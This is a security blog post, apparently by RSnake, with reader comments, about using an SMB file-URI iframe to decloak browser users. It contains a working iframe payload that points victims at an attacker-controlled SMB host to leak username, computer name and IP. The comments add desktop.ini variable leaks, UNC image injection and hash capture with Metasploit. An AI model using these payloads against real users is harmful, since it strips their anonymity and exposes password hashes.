Cenzic 232 Patent
Paid Advertising
web application security lab

SMB Decloaking

Still in line with the DefCon preso, next on the list of things I need to talk about is SMB. Yeah, I already talked about SMBenum, but that’s different - that is about knowing what you’ve got on your dive. SMB itself is a way for two computers to talk to one another. The simplest example is an iframe. Of course you need to have SMB running on both sides and they need to be able to communicate together for this to work. But the nice thing is if you’ve got Wireshark running you can get the real username, IP address, computer name, service pack and possibly other interesting tidbits.

<iframe src="file:///\\123.123.123.123/"></iframe>

Of course for this to work several things have to be true. One, the above IP address needs to be modified to be the attacker’s computer. Two, the attacker needs to be running SMB services to listen and get the information. Three, the company where the victim is connecting from must allow outbound SMB - which I’m told is only about 50%. So 50% of people running 60% of browsers (an IE variant) will be vulnerable to this. Still not terrible and isn’t particularly noisy either and requires no user interaction, which is nice.

10 Responses to “SMB Decloaking”

  1. Rosario Valotta Says:

    Hi, the same SMB issues can also be exploited using Windows Media Player embebbed in a web page. Used against a victim in an intranet environment it can lead the attacker to make a scan of the hosts reachable from the victim with an exact identification of hostname, domain, OS, cpu model, etc.
    I posted about this topic on my blog a couple of months ago.

  2. Sir Duke Says:

    Dude, what kind of a noob are you? This stuff has been talked about for years. See e.g. http://blog.metasploit.com/2008_11_01_archive.html; http://www.xfocus.net/articles/200305/smbrelay.html. You make it sound like you just discovered this. At least give credit where it’s due.

  3. sencaw Says:

    tried to locate that rosario and could not, could you hit me with the link please?

    on topic

    Good Post - Q. any ie ? Q. how particularly NOT noisy?

    thx

  4. RSnake Says:

    @Sir Duke - I think you mis-read my post. This isn’t about authentication tokens/NTLM challenge responses or anything like that. This is about the fact that it discloses the username and computer name in an _unauthenticated_ state. Nothing to do with passwords.

    And no, I probably didn’t invent it. Seems like anything anyone says has some foundation in other people’s research. No need to be hostile.

  5. RSnake Says:

    @sencaw - yeah all versions of IE appear to work. It’s not noisy in the sense where there’s no popups or anything to alert the user. From a network perspective it’s very noisy, but not that many people are watching the wire during typical web surfing activities.

  6. Rosario Valotta Says:

    @sencaw the link is http://sites.google.com/site/tentacoloviola

  7. Bob Says:

    You didn’t by chance grab this from deanonymizer.com’s IE 0-day scan that launched during BlackHat and Defcon this year, did you?

    Let me explain this a bit more about this.
    When IE uses this FILE URI and points to a directory/share using SMB, it looks for the desktop.ini file too. Using the correct variables in the path to set the folder’s icon, an attacker can reveal the %USERNAME%, %COMPUTERNAME%, %DOMAINNAME% (or Workgroup), and the real IP address of the user *IF* they are using a shitty proxy.

    Now what makes this even more interesting is the history of SMB. Besides revealing information, SMB has been prone to several vulnerabilities in the past. WebDAV, BTW, is used when SMB can’t make it outside the network for _X_ reason. If you look hard enough, you’ll find remote code execution in WebDAV. It’s already been found, but Windows 7 has fixed the issue so it’s a dying vuln.

    Go ahead and take a closer look at WebDAV, but just remember where you got your info from. Some people don’t take it lightly when credit isn’t given when it’s due. Take Kaminsky, for example, who tried taking the part of spotlight of Moxie’s SSL work…and he ended up in the zf05. Something to think about….

  8. opreat0r Says:

    may as well pwn them if you are going to inject img src=\\UNC .. :)

    http://forums.remote-exploit.org/showthread.php?t=12885

  9. RSnake Says:

    @Bob - cool, no I hadn’t heard about the deanonymizer project. I actually first started talking about this at Blackhat, incidentally (maybe even on the same day)? Small world. But yeah, I wasn’t thinking about using it to scan, just to passively listen to the wire. I’m sure you’re right and there is a lot of other stuff out there to be found.

    Which SSL work did Kaminksy steal? I didn’t make his presentation this year, and haven’t gotten the DVDs for the conference, so I haven’t seen it. I just heard something about MD2 being used….?

    @opreat0r - true, my speech with Jabra was just about decloaking. I leave the actual exploitation to the MetaSploit browser auto-pwn guys. They live and breath that kind of thing. Our speech was just about anti-privacy.

  10. HD Says:

    You can use metasploit’s smb_sniffer module to log all of these requests. You also get a crackable password hash.